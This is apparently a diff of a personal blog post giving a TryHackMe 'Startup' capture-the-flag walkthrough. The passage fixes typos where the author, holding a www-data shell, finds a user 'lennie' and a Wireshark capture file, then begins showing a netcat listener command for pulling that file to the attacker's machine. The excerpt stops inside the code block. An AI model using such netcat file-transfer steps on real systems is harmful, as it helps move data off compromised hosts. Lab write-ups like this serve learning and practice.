viksant/viksant.github.io/_posts/2022-10-22-Startup_machine_THM.md

 Looking through, we found a user called "lennie" in the /home directory, which can be used to stablish a ssh connection.
 Unfortunately, we dont have the password.
 So lets keep looking:

-If we check the root directory again, we can see that as www-data user we have access to a file called "incidents", whichis a wireshark file.
-Lets download get in into our local machine with the following command:
+If we check the root directory again, we can see that as www-data user we have access to a file called "incidents", which is a wireshark file.
+Lets download get it into our local machine with the following command:

 ```shell
 nc -lvpn 1234 > suspicious.pcapng {In our local machine}